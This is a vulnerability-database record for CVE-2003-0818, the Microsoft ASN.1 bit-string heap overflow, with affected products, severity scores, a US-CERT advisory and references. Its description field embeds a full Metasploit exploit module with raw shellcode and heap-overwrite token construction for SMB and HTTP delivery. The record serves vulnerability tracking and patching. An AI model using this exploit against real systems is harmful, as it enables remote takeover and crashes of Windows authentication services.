ID

VAR-200403-0051


CVE

CVE-2003-0818


TITLE

Microsoft ASN.1 Library improperly decodes constructed bit strings

Trust: 0.8

sources: CERT/CC: VU#583108

DESCRIPTION

Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. Microsoft Windows ASN.1 Library (msasn1.dll) Has a vulnerability related to integer overflow. For the vulnerability, arbitrary code may be executed remotely.A third party from a distance SYSTEM May execute arbitrary code with privileges. As a result, it is possible to gain administrative privileges on vulnerable systems. The issue presents itself in the ASN.1 bit string decoding routines, specifically the BERDecBitString() function. The issue manifests when the affected function attempts to process a constructed bit string that contain another nested constructed bit string. This vulnerability is exposed in a number of security related operating system components, including Kerberos (via UDP port 88), Microsoft IIS with SSL support enabled and NTLMv2 authentication (via TCP ports 135, 139 and 445). Other components may also be affected, though a comprehensive list is not available at this time. Client applications, which use the library, will be affected, including LSASS.EXE and CRYPT32.DLL (and any application that relies on CRYPT32.DLL). The vulnerable library is used frequently in components that handle certificates such as Internet Explorer and Outlook. Handling of signed ActiveX components could also present an exposure. It should be noted that because ASN.1 data will likely be encoded, for example Kerberos, SSL, IPSec or Base64 encoded, the malicious integer values may be obfuscated and as a result not easily detectable. Issues related to this vulnerability were originally covered in BID 9626 and 9743, further information has been made available which identifies that this is a distinct vulnerability in the library and so this specific issue has been assigned an individual BID. ** June 5, 2005 Update: An IRC bot style tool may be exploiting this vulnerability. This alert will be updated as further information becomes available. This issue is related to insufficient checking of data supplied via an externally supplied length field in ASN.1 BER encoded data. This could result in an excessive value being used in a heap allocation routine, allowing for large amounts of heap memory to be corrupted. This could be leveraged to corrupt sensitive values in memory, resulting in execution of arbitrary code. Exploitation of this issue will result in the corruption of heap based management structures, and may ultimately be leveraged by an attacker to have arbitrary code executed in the context of the affected process. ## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft ASN.1 Library Bitstring Heap Overflow', 'Description' => %q{ This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. Both vulnerabilities were fixed in the MS04-007 patch. You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. This exploit has been successfully tested with the win32/*/reverse_tcp payloads, however a few problems were encounted when using the equivalent bind payloads. Your mileage may vary. }, 'Author' => [ 'Solar Eclipse <solareclipse@phreedom.org>' ], 'License' => GPL_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0818'], [ 'OSVDB', '3902' ], [ 'BID', '9633'], [ 'URL', 'http://www.phreedom.org/solar/exploits/msasn1-bitstring/'], [ 'MSB', 'MS04-007'], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Privileged' => true, 'Payload' => { 'Space' => 1024, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed) { 'Platform' => 'win', }, ], ], 'DisclosureDate' => 'Feb 10 2004', 'DefaultTarget' => 0)) register_options( [ OptString.new('PROTO', [ true, "Which protocol to use: http or smb", 'smb']), ], self.class) end # This exploit is too destructive to use during automated exploitation. # Better Windows-based exploits exist at this time (Sep 2006) def autofilter false end # This is a straight port of Solar Eclipse's "kill-bill" exploit, published # as a Metasploit Framework module with his permission. This module is only # licensed under GPLv2, keep this in mind if you embed the Framework into # a non-GPL application. -hdm[at]metasploit.com def exploit # The first stage shellcode fixes the PEB pointer and cleans the heap stage0 = "\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+ "\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+ "\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+ "\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+ "\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+ "\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+ "\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+ "\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+ "\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+ "\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+ "\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+ "\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+ "\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+ "\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+ "\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+ "\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+ "\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+ "\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+ "\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+ "\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+ "\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+ "\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+ "\x08\x00\xeb\xfe" token = spnego_token(stage0, payload.encoded) case datastore['PROTO'] when 'smb' exploit_smb(token) when 'http' exploit_http(token) else print_status("Invalid application protocol specified, use smb or http") end end def exploit_smb(token) connect client = Rex::Proto::SMB::Client.new(sock) begin client.session_request(smb_hostname()) if not datastore['SMBDirect'] client.negotiate client.session_setup_ntlmv2_blob(token) rescue => e if (e.to_s =~ /error code 0x00050001/) print_status("The target system has already been exploited") else print_status("Error: #{e}") end end handler disconnect end def exploit_http(token) connect req = "GET / HTTP/1.0\r\n" req << "Host: #{ datastore['RHOST']}\r\n" req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n" sock.put(req) res = sock.get_once if (res and res =~ /0x80090301/) print_status("This server does not support the Negotiate protocol or has already been exploited") end if (res and res =~ /0x80090304/) print_status("This server responded with error code 0x80090304 (wth?)") end handler disconnect end # Returns an ASN.1 encoded string def enc_asn1(str) Rex::Proto::SMB::Utils::asn1encode(str) end # Returns an ASN.1 encoded bit string with 0 unused bits def enc_bits(str) "\x03" + enc_asn1("\x00" + str) end # Returns a BER encoded constructed bit string def enc_constr(*str_arr) "\x23" + enc_asn1(str_arr.join('')) end # Returns a BER encoded SPNEGO token def spnego_token(stage0, stage1) if !(stage0 and stage1) print_status("Invalid parameters passed to spnego_token") return end if (stage0.length > 1032) print_status("The stage 0 shellcode is longer than 1032 bytes") return end tag = "\x90\x42\x90\x42\x90\x42\x90\x42" if ((tag.length + stage1.length) > 1033) print_status("The stage 1 shellcode is too long") return end # The first two overwrites must succeed, so we write to an unused location # in the PEB block. We don't care about the values, because after this the # doubly linked list of free blocks is corrupted and we get to the second # overwrite which is more useful. fw = "\xf8\x0f\x01\x00" # 0x00010ff8 bk = "\xf8\x0f\x01" # The second overwrite writes the address of our shellcode into the # FastPebLockRoutine pointer in the PEB peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB bitstring = enc_constr( enc_bits("A" * 1024), "\x03\x00", enc_constr( enc_bits(tag + stage1 + ("B" * (1033-(tag+stage1).length))), enc_constr( enc_bits(fw + bk) ), enc_constr( enc_bits("CCCC" + peblock + stage0 + ("C" * (1032-stage0.length))), enc_constr( enc_bits("\xeb\x06" + make_nops(6)), enc_bits("D" * 1040) ) ) ) ) token = "\x60" + enc_asn1( # Application Constructed Object "\x06\x06\x2b\x06\x01\x05\x05\x02" + # SPNEGO OID "\xa0" + enc_asn1( # NegTokenInit (0xa0) "\x30" + enc_asn1( "\xa1" + enc_asn1( bitstring ) ) ) ) return token end end . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Multiple Vulnerabilities in Microsoft ASN.1 Library Original issue date: February 10, 2004 Last revised: -- Source: US-CERT A complete revision history is at the end of this document. According to information from eEye Digital Security, the vulnerabilities involve integer overflows and other flaws in integer arithmetic. Any application that loads the ASN.1 library could serve as an attack vector. In particular, ASN.1 is used by a number of cryptographic and authentication services such as digital certificates (x.509), Kerberos, NTLMv2, SSL,and TLS. Both client and server systems are affected. The Local Security Authority Subsystem (lsass.exe) and a component of the CryptoAPI (crypt32.dll) use the vulnerable ASN.1 library. Solution Apply a patch Apply the appropriate patch as specified by Microsoft Security Bulletin MS04-007. Vendor Information This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments. Microsoft Please see Microsoft Security Bulletin MS04-007. References * Vulnerability Note VU#216324 - <http://www.kb.cert.org/vuls/id/216324> * Vulnerability Note VU#583108 - <http://www.kb.cert.org/vuls/id/583108> * eEye Digital Security Advisory AD20040210 - <http://www.eeye.com/html/Research/Advisories/AD20040210.html> * eEye Digital Security Advisory AD20040210-2 - <http://www.eeye.com/html/Research/Advisories/AD20040210-2.html> * Microsoft Security Bulletin MS04-007 - <http://microsoft.com/technet/security/bulletin/MS04-007.asp> * Microsoft Knowledge Base Article 252648 - <http://support.microsoft.com/default.aspx?scid=252648> _________________________________________________________________ These vulnerabilities were researched and reported by eEye Digital Security. Information from eEye and Microsoft was used in this document. _________________________________________________________________ Feedback can be directed to the author, Art Manion. Copyright 2004 Carnegie Mellon University. Revision History February 10, 2004: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQFAKVrdXlvNRxAkFWARAuOvAJwL2gJJPBRdrtZ0Le4yyLQLu7CHewCgvaCW 5hU8LQ/oOC4sI8PpnkppCyg= =Oe/N -----END PGP SIGNATURE-----

Trust: 4.14

sources: NVD: CVE-2003-0818 // CERT/CC: VU#583108 // CERT/CC: VU#216324 // JVNDB: JVNDB-2004-000037 // BID: 13300 // BID: 9633 // BID: 9635 // VULMON: CVE-2003-0818 // PACKETSTORM: 83044 // PACKETSTORM: 32667

AFFECTED PRODUCTS

vendor:microsoftmodel: - scope: - version: -

Trust: 1.6

vendor:microsoftmodel:windows 2003 serverscope:eqversion:r2

Trust: 1.0

vendor:microsoftmodel:windows 2000scope:eqversion:*

Trust: 1.0

vendor:microsoftmodel:windows 2003 serverscope:eqversion:standard

Trust: 1.0

vendor:microsoftmodel:windows xpscope:eqversion:*

Trust: 1.0

vendor:microsoftmodel:windows 2003 serverscope:eqversion:web

Trust: 1.0

vendor:microsoftmodel:windows 2003 serverscope:eqversion:enterprise

Trust: 1.0

vendor:microsoftmodel:windows ntscope:eqversion:4.0

Trust: 1.0

vendor:microsoftmodel:windows 2003 serverscope:eqversion:enterprise_64-bit

Trust: 1.0

vendor:yahoomodel:messengerscope:eqversion:5.6.0.1358

Trust: 0.9

vendor:yahoomodel:messengerscope:eqversion:5.6.0.1356

Trust: 0.9

vendor:yahoomodel:messengerscope:eqversion:5.6.0.1355

Trust: 0.9

vendor:yahoomodel:messengerscope:eqversion:5.6.0.1351

Trust: 0.9

vendor:yahoomodel:messengerscope:eqversion:5.6.0.1347

Trust: 0.9

vendor:yahoomodel:messengerscope:eqversion:5.6

Trust: 0.9

vendor:vandykemodel:securecrtscope:eqversion:4.0.5

Trust: 0.9

vendor:vandykemodel:securecrtscope:eqversion:4.0.4

Trust: 0.9

vendor:vandykemodel:securecrtscope:eqversion:4.0.3

Trust: 0.9

vendor:vandykemodel:securecrtscope:eqversion:4.0.2

Trust: 0.9

vendor:vandykemodel:securecrtscope:eqversion:4.0.1

Trust: 0.9

vendor:microsoftmodel:windows xp professional sp1scope: - version: -

Trust: 0.9

vendor:microsoftmodel:windows xp professionalscope: - version: -

Trust: 0.9

vendor:microsoftmodel:windows xp home sp1scope: - version: -

Trust: 0.9

vendor:microsoftmodel:windows xp homescope: - version: -

Trust: 0.9

vendor:microsoftmodel:windows xp 64-bit edition version sp1scope:eqversion:2003

Trust: 0.9

vendor:microsoftmodel:windows xp 64-bit edition versionscope:eqversion:2003

Trust: 0.9

vendor:microsoftmodel:windows xp 64-bit edition sp1scope: - version: -

Trust: 0.9

vendor:microsoftmodel:windows xp 64-bit editionscope: - version: -

Trust: 0.9

vendor:microsoftmodel:windows server web editionscope:eqversion:2003

Trust: 0.9

vendor:microsoftmodel:windows server standard editionscope:eqversion:2003

Trust: 0.9

vendor:microsoftmodel:windows server enterprise edition itaniumscope:eqversion:20030

Trust: 0.9

vendor:microsoftmodel:windows server enterprise editionscope:eqversion:2003

Trust: 0.9

vendor:microsoftmodel:windows server datacenter edition itaniumscope:eqversion:20030

Trust: 0.9

vendor:microsoftmodel:windows server datacenter editionscope:eqversion:2003

Trust: 0.9

vendor:microsoftmodel:windows nt workstation sp6ascope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt workstation sp6scope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt workstation sp5scope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt workstation sp4scope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt workstation sp3scope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt workstation sp2scope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt workstation sp1scope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt workstationscope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt terminal server sp6scope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt terminal server sp5scope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt terminal server sp4scope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt terminal server sp3scope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt terminal server sp2scope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt terminal server sp1scope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt terminal serverscope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt server sp6ascope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt server sp6scope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt server sp5scope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt server sp4scope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt server sp3scope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt server sp2scope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt server sp1scope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows nt serverscope:eqversion:4.0

Trust: 0.9

vendor:microsoftmodel:windows 98sescope: - version: -

Trust: 0.9

vendor:microsoftmodel:windowsscope:eqversion:98

Trust: 0.9

vendor:microsoftmodel:windows server sp4scope:eqversion:2000

Trust: 0.9

vendor:microsoftmodel:windows server sp3scope:eqversion:2000

Trust: 0.9

vendor:microsoftmodel:windows server sp2scope:eqversion:2000

Trust: 0.9

vendor:microsoftmodel:windows server sp1scope:eqversion:2000

Trust: 0.9

vendor:microsoftmodel:windows serverscope:eqversion:2000

Trust: 0.9

vendor:microsoftmodel:windows professional sp4scope:eqversion:2000

Trust: 0.9

vendor:microsoftmodel:windows professional sp3scope:eqversion:2000

Trust: 0.9

vendor:microsoftmodel:windows professional sp2scope:eqversion:2000

Trust: 0.9

vendor:microsoftmodel:windows professional sp1scope:eqversion:2000

Trust: 0.9

vendor:microsoftmodel:windows professionalscope:eqversion:2000

Trust: 0.9

vendor:microsoftmodel:windows advanced server sp4scope:eqversion:2000

Trust: 0.9

vendor:microsoftmodel:windows advanced server sp3scope:eqversion:2000

Trust: 0.9

vendor:microsoftmodel:windows advanced server sp2scope:eqversion:2000

Trust: 0.9

vendor:microsoftmodel:windows advanced server sp1scope:eqversion:2000

Trust: 0.9

vendor:microsoftmodel:windows advanced serverscope:eqversion:2000

Trust: 0.9

vendor:intuitmodel:quickenscope:eqversion:2003

Trust: 0.9

vendor:aolmodel:instant messengerscope:eqversion:5.2.3292

Trust: 0.9

vendor:aolmodel:instant messengerscope:eqversion:5.1.3036

Trust: 0.9

vendor:aolmodel:instant messengerscope:eqversion:5.0.2938

Trust: 0.9

vendor:microsoftmodel:windows 2000scope: - version: -

Trust: 0.8

vendor:microsoftmodel:windows ntscope:eqversion:4.0 (server)

Trust: 0.8

vendor:microsoftmodel:windows ntscope:eqversion:4.0 (terminal_srv)

Trust: 0.8

vendor:microsoftmodel:windows ntscope:eqversion:4.0 (workstation)

Trust: 0.8

vendor:microsoftmodel:windows server 2003scope:eqversion:none

Trust: 0.8

vendor:microsoftmodel:windows server 2003scope:eqversion:(x64)

Trust: 0.8

vendor:microsoftmodel:windows xpscope:eqversion:(x64)

Trust: 0.8

vendor:microsoftmodel:windows xpscope:eqversion:sp3

Trust: 0.8

vendor:yahoomodel:messengerscope:eqversion:5.5.1249

Trust: 0.6

vendor:yahoomodel:messengerscope:eqversion:5.5

Trust: 0.6

vendor:musicmatchmodel:jukeboxscope:eqversion:8.2

Trust: 0.6

vendor:musicmatchmodel:jukeboxscope:eqversion:8.1

Trust: 0.6

vendor:musicmatchmodel:jukeboxscope:eqversion:8.0

Trust: 0.6

vendor:jascmodel:software paintshop proscope:eqversion:8.10

Trust: 0.6

vendor:jascmodel:software paintshop proscope:eqversion:8.01

Trust: 0.6

vendor:jascmodel:software paintshop proscope:eqversion:8.00

Trust: 0.6

vendor:jascmodel:software paintshop proscope:eqversion:7.04

Trust: 0.6

vendor:jascmodel:software paintshop proscope:eqversion:7.02

Trust: 0.6

vendor:jascmodel:software paintshop proscope:eqversion:7.01

Trust: 0.6

vendor:jascmodel:software paintshop proscope:eqversion:7.0

Trust: 0.6

vendor:jascmodel:software paintshop proscope:eqversion:6.02

Trust: 0.6

vendor:jascmodel:software paintshop proscope:eqversion:6.01

Trust: 0.6

vendor:jascmodel:software paintshop proscope:eqversion:6.0

Trust: 0.6

vendor:jascmodel:software paintshop proscope:eqversion:5.03

Trust: 0.6

vendor:jascmodel:software paintshop proscope:eqversion:5.01

Trust: 0.6

vendor:jascmodel:software paintshop proscope:eqversion:5.0

Trust: 0.6

vendor:intuitmodel:turbotaxscope:eqversion:2003

Trust: 0.6

vendor:aolmodel:instant messenger betascope:eqversion:5.5.3415

Trust: 0.6

vendor:altovamodel:xmlspy professional edition r2scope:eqversion:2004

Trust: 0.6

vendor:altovamodel:xmlspy professional editionscope:eqversion:2004

Trust: 0.6

vendor:altovamodel:xmlspy home edition r2scope:eqversion:2004

Trust: 0.6

vendor:altovamodel:xmlspy home editionscope:eqversion:2004

Trust: 0.6

vendor:altovamodel:xmlspy enterprise edition r2scope:eqversion:2004

Trust: 0.6

vendor:altovamodel:xmlspy enterprise editionscope:eqversion:2004

Trust: 0.6

vendor:adobemodel:acrobatscope:eqversion:6.0

Trust: 0.6

vendor:adobemodel:acrobatscope:eqversion:5.0.5

Trust: 0.6

vendor:adobemodel:acrobatscope:eqversion:5.0

Trust: 0.6

vendor:microsoftmodel:windows 2000scope:eqversion:sp1

Trust: 0.6

vendor:microsoftmodel:windows 2000scope:eqversion:sp3

Trust: 0.6

vendor:microsoftmodel:windows 2000scope:eqversion:professional

Trust: 0.6

vendor:microsoftmodel:windows 2000scope:eqversion:server

Trust: 0.6

vendor:microsoftmodel:windows 2000scope:eqversion:advanced_server

Trust: 0.6

vendor:microsoftmodel:windows 2000scope:eqversion:sp2

Trust: 0.6

vendor:vandykemodel:securecrtscope:eqversion:3.4.8

Trust: 0.3

vendor:vandykemodel:securecrtscope:eqversion:3.4.7

Trust: 0.3

vendor:vandykemodel:securecrtscope:eqversion:3.4.6

Trust: 0.3

vendor:vandykemodel:securecrtscope:eqversion:3.4.5

Trust: 0.3

vendor:vandykemodel:securecrtscope:eqversion:3.4.4

Trust: 0.3

vendor:vandykemodel:securecrtscope:eqversion:3.4.3

Trust: 0.3

vendor:vandykemodel:securecrtscope:eqversion:3.4.2

Trust: 0.3

vendor:vandykemodel:securecrtscope:eqversion:3.4.1

Trust: 0.3

vendor:vandykemodel:securecrtscope:eqversion:3.4

Trust: 0.3

vendor:vandykemodel:securecrtscope:eqversion:3.3.4

Trust: 0.3

vendor:vandykemodel:securecrtscope:eqversion:3.3.3

Trust: 0.3

vendor:vandykemodel:securecrtscope:eqversion:3.3.2

Trust: 0.3

vendor:vandykemodel:securecrtscope:eqversion:3.3.1

Trust: 0.3

vendor:vandykemodel:securecrtscope:eqversion:3.3

Trust: 0.3

vendor:vandykemodel:securecrtscope:eqversion:3.2.2

Trust: 0.3

vendor:vandykemodel:securecrtscope:eqversion:3.2.1

Trust: 0.3

vendor:vandykemodel:securecrtscope:eqversion:3.2

Trust: 0.3

vendor:vandykemodel:securecrtscope:eqversion:3.1.2

Trust: 0.3

vendor:vandykemodel:securecrtscope:eqversion:3.1.1

Trust: 0.3

vendor:vandykemodel:securecrtscope:eqversion:3.1

Trust: 0.3

vendor:vandykemodel:securecrtscope:eqversion:3.0

Trust: 0.3

vendor:vandykemodel:securecrtscope:eqversion:2.4

Trust: 0.3

vendor:microsoftmodel:small business serverscope:eqversion:20000

Trust: 0.3

vendor:microsoftmodel:internet explorer sp1scope:eqversion:6.0

Trust: 0.3

vendor:microsoftmodel:internet explorerscope:eqversion:6.0

Trust: 0.3

vendor:microsoftmodel:iisscope:eqversion:6.0

Trust: 0.3

vendor:microsoftmodel:iisscope:eqversion:5.1

Trust: 0.3

vendor:microsoftmodel:iisscope:eqversion:5.0

Trust: 0.3

vendor:microsoftmodel:exchange serverscope:eqversion:2003

Trust: 0.3

vendor:microsoftmodel:exchange server sp3scope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:exchange server sp2scope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:exchange server sp1scope:eqversion:2000

Trust: 0.3

vendor:microsoftmodel:exchange serverscope:eqversion:2000

Trust: 0.3

sources: CERT/CC: VU#583108 // CERT/CC: VU#216324 // BID: 13300 // BID: 9633 // BID: 9635 // JVNDB: JVNDB-2004-000037 // CNNVD: CNNVD-200403-040 // NVD: CVE-2003-0818

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2003-0818
value: HIGH

Trust: 1.0

CARNEGIE MELLON: VU#583108
value: 27.72

Trust: 0.8

CARNEGIE MELLON: VU#216324
value: 27.72

Trust: 0.8

NVD: CVE-2003-0818
value: HIGH

Trust: 0.8

CNNVD: CNNVD-200403-040
value: HIGH

Trust: 0.6

VULMON: CVE-2003-0818
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2003-0818
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

sources: CERT/CC: VU#583108 // CERT/CC: VU#216324 // VULMON: CVE-2003-0818 // JVNDB: JVNDB-2004-000037 // CNNVD: CNNVD-200403-040 // NVD: CVE-2003-0818

PROBLEMTYPE DATA

problemtype:NVD-CWE-Other

Trust: 1.0

sources: NVD: CVE-2003-0818

THREAT TYPE

network

Trust: 0.9

sources: BID: 13300 // BID: 9633 // BID: 9635

TYPE

Boundary Condition Error

Trust: 0.9

sources: BID: 13300 // BID: 9633 // BID: 9635

CONFIGURATIONS

sources: JVNDB: JVNDB-2004-000037

EXPLOIT AVAILABILITY

sources: VULMON: CVE-2003-0818

PATCH

title:MS04-007url:http://www.microsoft.com/technet/security/bulletin/MS04-007.mspx

Trust: 0.8

title:MS04-007url:http://www.microsoft.com/japan/technet/security/bulletin/MS04-007.mspx

Trust: 0.8

title: - url:https://github.com/nitishbadole/oscp-note-2

Trust: 0.1

title:OSCPurl:https://github.com/H3n2yk/OSCP

Trust: 0.1

title: - url:https://github.com/rmsbpro/rmsbpro

Trust: 0.1

sources: VULMON: CVE-2003-0818 // JVNDB: JVNDB-2004-000037

EXTERNAL IDS

db:CERT/CCid:VU#583108

Trust: 4.0

db:NVDid:CVE-2003-0818

Trust: 3.5

db:CERT/CCid:VU#216324

Trust: 2.9

db:USCERTid:TA04-041A

Trust: 2.6

db:BIDid:13300

Trust: 1.2

db:BIDid:9635

Trust: 1.1

db:XFid:15039

Trust: 0.8

db:JVNDBid:JVNDB-2004-000037

Trust: 0.8

db:CNNVDid:CNNVD-200403-040

Trust: 0.6

db:BIDid:9633

Trust: 0.3

db:EXPLOIT-DBid:153

Trust: 0.1

db:VULMONid:CVE-2003-0818

Trust: 0.1

db:PACKETSTORMid:83044

Trust: 0.1

db:PACKETSTORMid:32667

Trust: 0.1

sources: CERT/CC: VU#583108 // CERT/CC: VU#216324 // VULMON: CVE-2003-0818 // BID: 13300 // BID: 9633 // BID: 9635 // JVNDB: JVNDB-2004-000037 // PACKETSTORM: 83044 // PACKETSTORM: 32667 // CNNVD: CNNVD-200403-040 // NVD: CVE-2003-0818

REFERENCES

url:http://www.kb.cert.org/vuls/id/583108

Trust: 3.2

url:http://www.us-cert.gov/cas/techalerts/ta04-041a.html

Trust: 2.5

url:http://www.kb.cert.org/vuls/id/216324

Trust: 2.0

url:http://marc.info/?l=ntbugtraq&m=107650972617367&w=2

Trust: 1.7

url:http://marc.info/?l=bugtraq&m=107643892224825&w=2

Trust: 1.7

url:http://marc.info/?l=bugtraq&m=107643836125615&w=2

Trust: 1.7

url:http://marc.info/?l=ntbugtraq&m=107650972723080&w=2

Trust: 1.7

url:https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a799

Trust: 1.7

url:https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a797

Trust: 1.7

url:https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a796

Trust: 1.7

url:https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a653

Trust: 1.7

url:https://docs.microsoft.com/en-us/security-updates/securitybulletins/2004/ms04-007

Trust: 1.7

url:http://www.microsoft.com/technet/security/bulletin/ms04-007.asp

Trust: 1.6

url:http://support.microsoft.com/default.aspx?scid=252648

Trust: 1.6

url:http://www.itu.int/itu-t/asn1/

Trust: 1.6

url:http://www.asn1.org/

Trust: 1.6

url:http://www.eeye.com/html/research/advisories/ad20040210-2.html

Trust: 1.4

url:http://www.securityfocus.com/bid/13300

Trust: 0.9

url:http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp

Trust: 0.9

url:/archive/1/354227

Trust: 0.9

url:http://www.eeye.com/html/research/advisories/ad20040210.html

Trust: 0.8

url:http://www.ciac.org/ciac/bulletins/o-065.shtml

Trust: 0.8

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2003-0818

Trust: 0.8

url:http://www.ipa.go.jp/security/ciadr/vul/20040212-asn1.html

Trust: 0.8

url:http://xforce.iss.net/xforce/xfdb/15039

Trust: 0.8

url:http://www.jpcert.or.jp/wr/2004/wr040701.txt

Trust: 0.8

url:http://www.jpcert.or.jp/at/2004/at040001.txt

Trust: 0.8

url:http://jvn.jp/cert/jvnta04-041a/

Trust: 0.8

url:http://jvn.jp/tr/trta04-041a/

Trust: 0.8

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2003-0818

Trust: 0.8

url:http://www.securityfocus.com/bid/9635

Trust: 0.8

url:http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?vname=worm%5frbot%2ebjf

Trust: 0.8

url:http://www.isskk.co.jp/support/techinfo/general/ms_asn1_164.html

Trust: 0.8

url:http://www.cyberpolice.go.jp/important/20040211_084159.html

Trust: 0.8

url:http://www.phreedom.org/solar/exploits/msasn1-bitstring/

Trust: 0.3

url:http://support.coresecurity.com/impact/exploits/b2dfb901799eec9f96bf4cb85af2723d.html

Trust: 0.3

url:/archive/1/353320

Trust: 0.3

url:https://cwe.mitre.org/data/definitions/.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://www.exploit-db.com/exploits/153/

Trust: 0.1

